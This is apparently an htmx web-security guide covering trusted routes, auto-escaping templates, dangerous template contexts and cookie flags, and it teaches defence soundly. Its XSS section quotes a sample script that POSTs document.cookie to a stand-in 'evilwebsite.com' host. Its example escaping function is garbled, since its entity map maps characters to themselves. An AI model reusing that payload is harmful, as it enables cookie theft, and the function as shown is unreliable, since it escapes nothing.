Web Security Basics using HTMX
Learn about what HTMX is and how you can use it.
As htmx has gotten more popular, itâs reached communities who have never written server-generated HTML before. Dynamic HTML templating was, and still is, the standard way to use many popular web frameworksâlike Rails, Django, and Springâbut it is a novel concept for those coming from Single-Page Application (SPA) frameworksâlike React and Svelteâwhere the prevalence of JSX means you never write HTML directly.
But have no fear! Writing web applications with HTML templates is a slightly different security model, but itâs no harder than securing a JSX-based application, and in some ways itâs a lot easier.
Overview
These are web security basics with htmx, but theyâre (mostly) not htmx-specificâthese concepts are important to know if youâre putting any dynamic, user-generated content on the web.
For this guide, you should already have a basic grasp of the semantics of the web, and be familiar with how to write a backend server (in any language). For instance, you should know not to create GET routes that can alter the backend state. We also assume that youâre not doing anything super fancy, like making a website that hosts other peopleâs websites. If youâre doing anything like that, the security concepts you need to be aware of far exceed the scope of this guide.
We make these simplifying assumptions in order to target the widest possible audience, without including distracting informationâobviously this canât catch everyone. No security guide is perfectly comprehensive. If you feel thereâs a mistake, or an obvious gotcha that we should have mentioned, please reach out and weâll update it.
The Golden Rules
Follow these four simple rules, and youâll be following the client security best practices:
- Only call routes you control
- Always use an auto-escaping template engine
- Only serve user-generated content inside HTML tags
- If you have authentication cookies, set them with Secure, HttpOnly, and SameSite=Lax
In the following section, weâll discuss what each of these rules does, and what kinds of attack they protect against. The vast majority of htmx usersâthose using htmx to build a website that allows users to login, view some data, and update that dataâshould never have any reason to break them.
Understanding the Rules
Only call routes you control
This is the most basic one, and the most important: do not call untrusted routes with htmx.
In practice, this means you should only use relative URLs. This is fine:
<button hx-get="/events">Search events</button>
But this is not:
<button hx-get="https://google.com/search?q=events">Search events</button>
The reason for this is simple: htmx inserts the response from that route directly into the userâs page. If the response has a malicious <script>
inside it, that script can steal the userâs data. When you donât control the route, you cannot guarantee that whoever does control the route wonât add a malicious script.
Fortunately, this is a very easy rule to follow. Hypermedia APIs (i.e. HTML) are specific to the layout of your application, so there is almost never any reason youâd want to insert someone elseâs HTML into your page. All you have to do is make sure you only call your own routes (htmx 2 will actually disable calling other domains by default).
Though itâs not quite as popular these days, a common SPA pattern was to separate the frontend and backend into different repositories, and sometimes even to serve them from different URLs. This would require using absolute URLs in the frontend, and often, disabling CORS. With htmx (and, to be fair, modern React with NextJS) this is an anti-pattern.
Instead, you simply serve your HTML frontend from the same server (or at least the same domain) as your backend, and everything else falls into place: you can use relative URLs, youâll never have trouble with CORS, and youâll never call anyone elseâs backend.
htmx executes HTML; HTML is code; never execute untrusted code.
Always use an auto-escaping template engine
When you send HTML to the user, all dynamic content must be escaped. Use a template engine to construct your responses, and make sure that auto-escaping is on.
Fortunately, all template engines support escaping HTML, and most of them enable it by default.
The kind of vulnerability this prevents is often called a Cross-Site Scripting (XSS) attack, a term that is broadly used to mean the injection of any unexpected content into your webpage. Typically, an attacker uses your APIs to store malicious code in your database, which you then serve to your other users who request that info.
For example, letâs say youâre building a dating site, and it lets users share a little bio about themselves. Youâd render that bio like this, with {{ user.bio }} being the bio stored in the database:
<p>{{ user.bio }}</p>
If a malicious user wrote a bio with a script element in itâlike one that sends the clientâs cookie to another websiteâthen this HTML will get sent to every user who views that bio:
<p>
<script>
fetch("evilwebsite.com", { method: "POST", body: document.cookie });
</script>
</p>
Fortunately this one is so easy to fix that you can write the code yourself.
Whenever you insert untrusted (i.e. user-provided) data, you just have to
replace eight characters with their non-code equivalents. This is an example
using JavaScript: /** * Replace any characters that could be used to inject a
malicious script in an HTML context. */ export function escapeHtmlText (value) {
const stringValue = value.toString() const entityMap = { '&': '&', '<':
'<', '>': '>', '"': '"', "'": ''', '/': '/', '`':
'`', '=': '=' } // Match any of the characters inside /[ ... ]/ const
regex = /[&<>"'`=/]/g return stringValue.replace(regex, match =>
entityMap[match]) }
This tiny JS function replaces < with <, " with ", and so on. These characters will still render properly as < and " when theyâre used in the text, but canât be interpreted as code constructs. The previous malicious bio will now be converted into the following HTML:
<p>
<script> fetch('evilwebsite.com', { method: 'POST',
data: document.cookie }) </script>
</p>
which displays harmlessly as text.
Fortunately, as established above, you donât have to do your escaping manuallyâI just wanted to demonstrate how simple these concepts are. Every template engine has an auto-escaping feature, and youâre going to want to use a template engine anyway. Just make sure that escaping is enabled, and send all your HTML through it.
Only serve user-generated content inside HTML tags
This is an addendum to the template engine rule, but itâs important enough to call out on its own. Do not allow your users to define arbitrary CSS or JS content, even with your auto-escaping template engine.
<script>
const userName = {{ user.name }}
</script>
<!-- Don't include inside CSS tags -->
<style>
h1 { color: {{ user.favorite_color }} }
</style>
And, donât use user-defined attributes or tag names either:
<!-- Don't allow user-defined tag names -->
<{{ user.tag }}></{{ user.tag }}>
<!-- Don't allow user-defined attributes -->
<a {{ user.attribute }}></a>
<!-- User-defined attribute VALUES are sometimes okay, it depends -->
<a class="{{ user.class }}"></a>
<!-- Escaped content is always safe inside HTML tags (this is fine) -->
<a>{{ user.name }}</a>
CSS, JavaScript, and HTML attributes are âdangerous contexts,â places where itâs not safe to allow arbitrary user input, even if itâs escaped. Escaping will protect you from some vulnerabilities here, but not all of them; the vulnerabilities are varied enough that itâs safest to default to not doing any of these.
Inserting user-generated text directly into a script tag should never be necessary, but there are some situations where you might let users customize their CSS or customize HTML attributes. Handling those properly will be discussed down below.
Secure your cookies
The best way to do authentication with htmx is using cookies. And because htmx encourages interactivity primarily through first-party HTML APIs, it is usually trivial to enable the browserâs best cookie security features. These three in particular:
- Secure - only send the cookie via HTTPS, never HTTP
- HttpOnly - donât make the cookie available to JavaScript via document.cookie
- SameSite=Lax - donât allow other sites to use your cookie to make requests, unless itâs just a plain link
To understand what these protect you against, letâs go over the basics. If you come from JavaScript SPAs, where itâs common to authenticate using the Authorization header, you might not be familiar with how cookies work. Fortunately theyâre very simple. (Please note: this is not an âauthentication with htmxâ tutorial, just an overview of cookie tokens generally)
If your users log in with a
Last updated 17 Aug 2024, 12:31 +0200 .